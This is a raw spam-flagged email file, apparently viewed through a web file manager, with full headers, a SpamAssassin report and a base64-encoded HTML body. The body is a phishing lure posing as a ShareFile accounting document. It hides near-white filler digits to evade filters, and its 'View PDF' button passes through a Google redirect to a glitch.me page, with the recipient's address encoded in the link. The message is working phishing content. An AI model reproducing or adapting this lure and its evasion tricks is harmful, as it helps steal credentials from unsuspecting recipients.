OwlCyberSecurity - MANAGER

Edit File: 1746996379.M319469P2644648.premium128.web-hosting.com,S=8172,W=8303

Return-Path: <> Delivered-To: contact+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id oCl4DpsMIWioWigAAvhI2g (envelope-from <>) for <contact+spam@gourayafroid.com>; Sun, 11 May 2025 16:46:19 -0400 Return-path: <> Envelope-to: contact@gourayafroid.com Delivery-date: Sun, 11 May 2025 16:46:19 -0400 Received: from 179.47.240.35.bc.googleusercontent.com ([35.240.47.179]:59454 helo=[10.88.0.4]) by premium128.web-hosting.com with esmtp (Exim 4.98.1) id 1uEDYv-0000000BiUh-1oeW for contact@gourayafroid.com; Sun, 11 May 2025 16:46:18 -0400 Content-Type: multipart/related; boundary="===============6569419330805373258==" MIME-Version: 1.0 From: Gourayafroid Accounts department <accounting@gourayafroid.com> To: contact@gourayafroid.com X-Priority: 2 X-Spam-Status: Yes, score=10.7 X-Spam-Score: 107 X-Spam-Bar: ++++++++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: ShareFile2Attachments2From2Accounting02220 Direct Payment0 Doc_Outgoing.pdf 12 May, 2025 5608KB 2 2222 View PDF2003 Content analysis details: (10.7 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 1.4 MISSING_DATE Missing Date: header 4.7 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL [35.240.47.179 listed in zen.spamhaus.org] 0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict Alignment 0.0 TVD_RCVD_IP Message was received from an IP address 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URI: doc087778-09intra00.glitch.me] 0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [35.240.47.179 listed in sa-accredit.habeas.com] 0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [35.240.47.179 listed in sa-trusted.bondedsender.org] 0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [35.240.47.179 listed in bl.score.senderscore.com] 0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to background 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 0.0 HTML_MESSAGE BODY: HTML included in message 1.2 HTML_OBFUSCATE_10_20 BODY: Message is 10% to 20% HTML obfuscation 0.8 KAM_INFOUSMEBIZ Prevalent use of .info|.us|.me|.me.uk|.biz|xyz|id|rocks|life domains in spam/malware 2.6 RDNS_DYNAMIC Delivered to internal network by host with dynamic-looking rDNS X-Spam-Flag: YES Subject: ***SPAM*** =?utf-8?q?New_Electronic_Order_Confirmation_to_be_signed?= --===============6569419330805373258== Content-Type: text/html; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: base64 PGh0bWw+PGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRl bnQ9IklFPWVkZ2UiPgogICAgPC9oZWFkPgogICAgPGJvZHk+PGZvbnQgZmFjZT0iQ2FsaWJyaSxI ZWx2ZXRpY2Esc2Fucy1zZXJpZixFbW9qaUZvbnQsQXBwbGUgQ29sb3IgRW1vamksU2Vnb2UgVUkg RW1vamksTm90b0NvbG9yRW1vamksU2Vnb2UgVUkgU3ltYm9sLEFuZHJvaWQgRW1vamksRW1vamlT eW1ib2xzIj48dGFibGUgd2lkdGg9IjUxOCIgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkIHJnYigy MDQsIDIwNCwgMjA0KTsgYm9yZGVyLWltYWdlOiBub25lOyB3aWR0aDogNTE4LjRweDsgYmFja2dy b3VuZC1jb2xvcjogcmdiKDI0NiwgMjQ2LCAyNDYpOyI+PHRib2R5Pjx0cj48dGQgYWxpZ249Imxl ZnQiIHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzogMTVweCAxMHB4IDE1cHggMjBweDsgdGV4 dC1hbGlnbjoganVzdGlmeTsiPgogICAgPGZvbnQgY29sb3I9IiMzMzMzMzMiIHN0eWxlPSdmb250 LWZhbWlseTogImNhbGlicmkiICwgImhlbHZldGljYSIgLCAiYXJpYWwiICwgc2Fucy1zZXJpZiAs IHNlcmlmICwgImVtb2ppZm9udCI7Jz5TaGFyZUZpbGU8Zm9udCBjb2xvcj0iI2VmZWZlZiIgc2l6 ZT0iMSI+PHNwYW4gc3R5bGU9ImZvbnQtc2l6ZTogOXB4OyI+Mjwvc3Bhbj48L2ZvbnQ+QXR0YWNo bWVudHM8Zm9udCBjb2xvcj0iI2VmZWZlZiIgc2l6ZT0iMSI+PHNwYW4gc3R5bGU9ImZvbnQtc2l6 ZTogOXB4OyI+Mjwvc3Bhbj48L2ZvbnQ+RnJvbTxmb250IGNvbG9yPSIjZWZlZmVmIiBzaXplPSIx Ij48c3BhbiBzdHlsZT0iZm9udC1zaXplOiA5cHg7Ij4yPC9zcGFuPjwvZm9udD5BY2M8d2JyPm91 bnRpbmc8Zm9udCBjb2xvcj0iI2VmZWZlZiIgc2l6ZT0iMSI+PHNwYW4gc3R5bGU9ImZvbnQtc2l6 ZTogMTJweDsiPjAyMjIwPC9zcGFuPjwvZm9udD48L2ZvbnQ+PC90ZD48L3RyPjx0cj4KICAgIDx0 ZCBzdHlsZT0ibWFyZ2luOiAwcHg7IHBhZGRpbmc6IDBweCAyMHB4IDIwcHg7IiBjb2xzcGFuPSIy Ij48dGFibGUgd2lkdGg9IjQ3OCIgc3R5bGU9IndpZHRoOiA0NzguNHB4OyBiYWNrZ3JvdW5kLWNv bG9yOiByZ2IoMjU1LCAyNTUsIDI1NSk7Ij48dGJvZHk+PHRyPjx0ZCBzdHlsZT0ibWFyZ2luOiAw cHg7IHBhZGRpbmc6IDZweCAwcHggNnB4IDIwcHg7Ij48Zm9udCBzdHlsZT0nZm9udC1mYW1pbHk6 ICJjYWxpYnJpIiAsICJoZWx2ZXRpY2EiICwgImFyaWFsIiAsIHNhbnMtc2VyaWYgLCBzZXJpZiAs ICJlbW9qaWZvbnQiOyc+RGlyZWN0IFBheW1lbnQ8Zm9udCBjb2xvcj0id2hpdGUiIHNpemU9IjIi PjxzcGFuIHN0eWxlPSJmb250LXNpemU6IDE0cHg7Ij4wPC9zcGFuPjwvZm9udD4KICAgIERvY19P dXRnb2luZy5wZGYgPHNwYW4gc3R5bGU9ImJhY2tncm91bmQ6IG5vbmU7IGJvcmRlcjogY3VycmVu dENvbG9yOyBib3JkZXItaW1hZ2U6IG5vbmU7IGxpbmUtaGVpZ2h0OiAwJTsgZGlzcGxheTogbm9u ZTsgbWF4LWhlaWdodDogMCU7IG1heC13aWR0aDogMCU7Ij48L3NwYW4+MTIgTWF5LCAyMDI1PC9m b250PjwvdGQ+PHRkIGFsaWduPSJyaWdodCIgc3R5bGU9Im1hcmdpbjogMHB4OyBwYWRkaW5nOiA2 cHggMjBweCA2cHggMHB4OyI+PGZvbnQgY29sb3I9IiM5OTk5OTkiIHNpemU9IjIiIHN0eWxlPSdm b250LWZhbWlseTogImNhbGlicmkiICwgImhlbHZldGljYSIgLCAiYXJpYWwiICwgc2Fucy1zZXJp ZiAsIHNlcmlmICwgImVtb2ppZm9udCI7Jz48c3BhbiBzdHlsZT0iZm9udC1zaXplOiAxNHB4OyI+ NTYwPGZvbnQgY29sb3I9IndoaXRlIiBzaXplPSIyIj48c3BhbiBzdHlsZT0iZm9udC1zaXplOiAx NnB4OyI+ODwvc3Bhbj48L2ZvbnQ+S0I8Zm9udCBjb2xvcj0id2hpdGUiPgogICAgMjwvZm9udD48 YnI+PC9zcGFuPjwvZm9udD48L3RkPjwvdHI+PC90Ym9keT48L3RhYmxlPjwvdGQ+PC90cj48dHI+ PHRkIHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZy1ib3R0b206IDEwcHg7IHBhZGRpbmctbGVm dDogMjBweDsiIGNvbHNwYW49IjIiPjx0YWJsZSB3aWR0aD0iMTMzIiBzdHlsZT0id2lkdGg6IDEz My45MXB4OyI+PHRib2R5Pjx0cj48dGQgc3R5bGU9Im1hcmdpbjogMHB4OyBwYWRkaW5nOiA5cHgg MTVweDsgYm9yZGVyLXJhZGl1czogMnB4OyBiYWNrZ3JvdW5kLWNvbG9yOiByZ2IoMzIsIDExMywg MTk3KTsiPjxmb250IGNvbG9yPSIjMjk2OWIwIiBzaXplPSIxIj48c3BhbiBzdHlsZT0iZm9udC1z aXplOiA4cHg7Ij4yMjIyPC9zcGFuPjwvZm9udD4KICAgIDxhIHN0eWxlPSJjb2xvcjogcmdiKDE3 LCA4NSwgMjA0KTsiIGhyZWY9Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20vdHJhdmVsL2Nsaz9wYz1B QTgwT3N6d2tWSEgxVGRmaTU2UUFkUV9xVnhYQXNoaUEzQjljNVhqLXlIdktTUktPWl91YlRSMmlr QlpnTG9iRTdwcFc1VVhmbEpYR01ETGQ4bF82Vk1xVzI5LXBWdGM3NENFX0NWcHptamp3cGl0X04t dlNVOFB0bVhUWjFGS3kyWUpJZyZhbXA7cGN1cmw9aHR0cHM6Ly9kb2MwODc3NzgtMDlpbnRyYTAw LmdsaXRjaC5tZSNZMjl1ZEdGamRFQm5iM1Z5WVhsaFpuSnZhV1F1WTI5dCIgdGFyZ2V0PSJfYmxh bmsiIHJlbD0ibm9vcGVuZXIgbm9yZWZlcnJlciBub29wZW5lciBub3JlZmVycmVyIj48Zm9udCBj b2xvcj0id2hpdGUiIHNpemU9IjIiIHN0eWxlPSdmb250LWZhbWlseTogImNhbGlicmkiICwgImhl bHZldGljYSIgLCAiYXJpYWwiICwgc2Fucy1zZXJpZiAsIHNlcmlmICwgImVtb2ppZm9udCI7Jz48 c3BhbiBzdHlsZT0iZm9udC1zaXplOiAxNHB4OyI+CiAgICBWaWV3IFBERjwvc3Bhbj48L2ZvbnQ+ PC9hPjxmb250IGNvbG9yPSIjMjk2OWIwIiBzaXplPSIxIj48c3BhbiBzdHlsZT0iZm9udC1zaXpl OiA4cHg7Ij4yMDAzPC9zcGFuPjwvZm9udD48L3RkPjwvdHI+PC90Ym9keT48L3RhYmxlPjwvdGQ+ PC90cj48L3Rib2R5PjwvdGFibGU+PC9mb250PgogICAgPC9ib2R5PjwvaHRtbD4= --===============6569419330805373258==--